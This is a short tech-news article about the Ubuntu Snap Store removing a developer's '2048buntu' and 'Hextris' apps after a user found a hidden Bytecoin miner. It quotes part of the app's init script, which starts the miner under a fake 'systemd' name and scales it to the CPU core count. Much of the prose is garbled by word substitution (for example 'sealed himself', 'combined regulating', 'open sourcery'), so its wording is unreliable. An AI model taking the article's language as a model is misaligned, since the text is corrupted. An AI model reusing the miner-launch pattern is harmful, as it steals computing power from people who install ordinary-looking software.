Ubuntu sends crypto-mining apps out of the store and into a tomb

Admins of a Ubuntu Store have pulled all apps from a developer who sealed himself “Nicholas Tomb”, and from his e-mail signature apparently wanted to crypto-mine himself into a Ferrari.

Mr Tomb’s “2048buntu” and “Hextris applications are now absent from a store, with their dismissal sparked by a GitHub criticism about a 2048buntu. User Tarwirdur wrote “This focus contains dark сrypto-currency miner inside” (it was mining Bytecoin) and asked how this could be reported.

Here’s a formula Tarwirdur speckled (look for a e-mail sig in a seventh line):

squashfs-root/systemd - miner
squashfs-root/start - init script:


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores  4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2

Canonical’s Adam Collard responded “yes, we’ve private all applications from this author tentative serve investigations. Thank we for your vigilance!”

The apps were combined regulating Ubuntu’s “Snaps” tool, that packages formula so that all their dependencies float along, and implement with an auto-updater. Canonical combined Snaps to try and facilitate package deployment on Linux distributions.

Apps with ride-along miners are tough to spot: even a likes of Google and Apple, that both have money and people galore, skip antagonistic apps from time to time. The far-smaller Canonical has a advantage of open sourcery providing an army of crook-code-detectors. ®

Minds Mastering Machines – Call for papers now open